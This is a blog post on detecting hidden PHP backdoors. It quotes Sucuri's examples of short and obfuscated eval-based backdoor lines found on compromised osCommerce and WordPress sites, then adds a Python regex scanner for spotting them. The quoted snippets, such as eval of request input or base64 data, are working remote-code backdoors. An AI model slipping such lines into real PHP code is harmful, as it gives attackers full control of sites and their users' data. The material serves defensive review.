Some examples of backdoors in PHP scripts

Sucuri.net has published examples of current PHP backdoors, some of which I (at least) would never have noticed when reviewing a script ;(

"On most online forums, people tell you to search for “eval (base64_decode” and things like that to identify hidden backdoors, but that’s likely not to find everything (and your site will just get reinfected).

For example, on the latest oscommerce compromises, all the sites had the following code added to the application_top.php file:

if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.

What about this one:

$wp_theme_icon = create_function('', file_get_contents('/path/wp-content/themes/themename/images/void.jpg')); $wp_theme_icon();

What do you think? Yes, another backdoor, but this time the bulk of it is hidden inside an image (void.jpg). See what we mean by being hard to detect and search for?

Fun Quiz: Find the backdoor?

Since backdoors can be in any type or shape, let’s look at some examples:

The “Filesman” backdoor, big, complex and easy to find:

$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = "SQL";
$default_charset = "Windows-1251";
$protectionoffer = "ficken";
preg_replace("/.*/e","\x65\x76\x61\x6C.. hundreds more lines..

Another simple backdoor, executing any code from the “php” request:

eval (base64_decode($_POST["php"]));

A WordPress-based backdoor. This time, the bad content is hidden inside the database (the wp_options table).

return @eval(get_option('blogopt1'));

A messy backdoor we are seeing in the latest timthumb.php attacks. In this case, all the variables are completely random per case and per file:

function aknhtkmml3($ur5){$dtuq='$u';$pnt='e6';$p5zy='r';$xcl4='e(';$feuh='od';$qjka='dec';$rhi='$u';
$m='as';$xcew=');';$iw='_';$jutx='5=b';$fwiw='4';$zqi='r';$pwrb='5';
eval($rhi.$p5zy.$jutx.$m.$pnt.$fwiw.$iw.$qjka.$feuh.$xcl4.$dtuq.$zqi.$pwrb…
return $ur5;}$sk25='M3JffC1WcjMrVi1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a…

Another messy one. Do you know how the code is executed there? Preg_replace with the “e” modifier actually acts like an “eval”:

$lllllll='lllllllll';
$llllll="/^.$/e";
$llllllll='ZnVuY3Rpb24gZnVu3STVFNmxObm1V… LONG LINE of code.. dXBoQmRxemtuRE1SSXJwdjUwd3NWUUhrWmV3dWFKbHUvZzVpc1JKa0M1TWF2RFVMV1cwUG1XKzJF
$lllllllll=pack('H*', '406576616c286261736536345f6465636f646528').'\$llllllll))';
preg_replace($llllll, $lllllllll, $lllllll);

Searching for base64_decode? Well, what happens when the attackers do this:

<?php $XZKsyG='as';$RqoaUO='e';$ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';$joEDdb='b'.$XZKsyG.$RqoaUO.(64).'_'.'d'.$RqoaUO.'c'.'o'.'d'.$RqoaUO;@$ygDOEJ(@$joEDdb('ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY…

And those are just some simple examples…"
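The quoted post's point is that a grep for "eval(base64_decode" misses most of the families it lists. As an added example (my code, not part of the Sucuri post and not one of their tools), the Python triage scanner below encodes each of those families as a heuristic rule: eval of request input, eval of a database option, create_function fed from a file, pack('H*') hex strings, calls through a variable function name, names glued together from short fragments, and preg_replace patterns carrying the /e modifier, including the case where the pattern is passed through a variable. The rule names and the sample files are my own constructions; the samples mirror the quoted snippets with their payloads stripped, plus one clean file to show that ordinary base64_decode and preg_replace use does not fire.

```python
import re
from typing import Dict, List

# Hypothetical rule set modelled on the backdoor families quoted above.
# These are triage heuristics for a code reviewer, not a published signature list.
SUPERGLOBAL = r"\$_(?:REQUEST|GET|POST|COOKIE)\b"
RULES = [
    ("eval of request input", re.compile(r"\beval\s*\([^;]*" + SUPERGLOBAL)),
    ("eval of base64_decode", re.compile(r"\beval\s*\(\s*@?base64_decode\s*\(")),
    ("eval of database option", re.compile(r"\beval\s*\(\s*@?get_option\s*\(")),
    ("eval of concatenated fragments", re.compile(r"\beval\s*\(\s*\$\w+\s*\.\s*\$\w+")),
    ("create_function fed from a file",
     re.compile(r"\bcreate_function\s*\([^;]*\bfile_get_contents\s*\(")),
    ("hex-packed string", re.compile(r"\bpack\s*\(\s*['\"]H\*?['\"]")),
    ("call through a variable function name", re.compile(r"@?\$[A-Za-z_]\w*\s*\(")),
    # four or more short literals / variables chained with '.' (e.g. 'b'.$x.'64'.'_')
    ("name assembled from short fragments",
     re.compile(r"(?:(?:['\"][^'\"]{1,2}['\"]|\$\w+)\s*\.\s*){4,}")),
]

# First argument of preg_replace(): a string literal or a variable.
PREG_CALL = re.compile(r"\bpreg_replace\s*\(\s*(\$\w+|['\"][^'\"]*['\"])")
# A PHP regex literal: quote, delimiter, body, same delimiter, flags, quote.
REGEX_LITERAL = re.compile(r"^['\"](\W)(.*)\1([A-Za-z]*)['\"]$", re.S)


def preg_e_modifier(src: str) -> List[str]:
    """Return preg_replace() calls whose pattern carries the /e flag (which
    evaluates the replacement as code), resolving a pattern passed as $var
    through a simple `$var = 'literal';` assignment elsewhere in the file."""
    hits: List[str] = []
    for call in PREG_CALL.finditer(src):
        arg = call.group(1)
        if arg.startswith("$"):
            assign = re.search(re.escape(arg) + r"(?!\w)\s*=\s*(['\"][^'\"]*['\"])\s*;", src)
            if not assign:
                continue  # pattern built dynamically; out of scope for this heuristic
            arg = assign.group(1)
        lit = REGEX_LITERAL.match(arg)
        if lit and "e" in lit.group(3):
            hits.append(call.group(0))
    return hits


def scan(src: str) -> List[str]:
    """Names of every rule that fires on one PHP source text, in rule order."""
    findings = [name for name, rx in RULES if rx.search(src)]
    if preg_e_modifier(src):
        findings.append("preg_replace with /e modifier (eval in disguise)")
    return findings


def scan_all(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a mapping of file name -> source text; keep only files with findings."""
    report: Dict[str, List[str]] = {}
    for name, src in files.items():
        hits = scan(src)
        if hits:
            report[name] = hits
    return report


# Constructed sample files (payloads stripped), one per quoted family plus a clean one.
SAMPLES: Dict[str, str] = {
    "application_top.php": "<?php\nif (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));\n",
    "post.php": "<?php\neval(base64_decode($_POST['php']));\n",
    "theme.php": "<?php\n$wp_theme_icon = create_function('', file_get_contents('/path/images/void.jpg'));\n$wp_theme_icon();\n",
    "options.php": "<?php\nreturn @eval(get_option('blogopt1'));\n",
    "timthumb.php": "<?php\nfunction f($u){$a='$u';$b='=1;';eval($a.$b);return $u;}\n",
    "l.php": "<?php\n$l1='x';\n$l2=\"/^.$/e\";\n$l3=pack('H*', '41');\npreg_replace($l2, $l3, $l1);\n",
    "glued.php": "<?php $a='as';$b='e';$f=$a.'s'.$b.'r'.'t';@$f('1 == 1');\n",
    "clean.php": "<?php\n$img = base64_decode($_POST['avatar']);\n$slug = preg_replace('/[^a-z0-9]+/i', '-', $title);\n",
}

if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        print(f"{name}: {', '.join(hits)}")
```

The rules are deliberately loose (a variable function call or a chain of short fragments is legitimate in some code), so treat a hit as a reason to read the file, not as proof of compromise; the clean sample shows that plain base64_decode or a normal preg_replace pattern does not fire on its own.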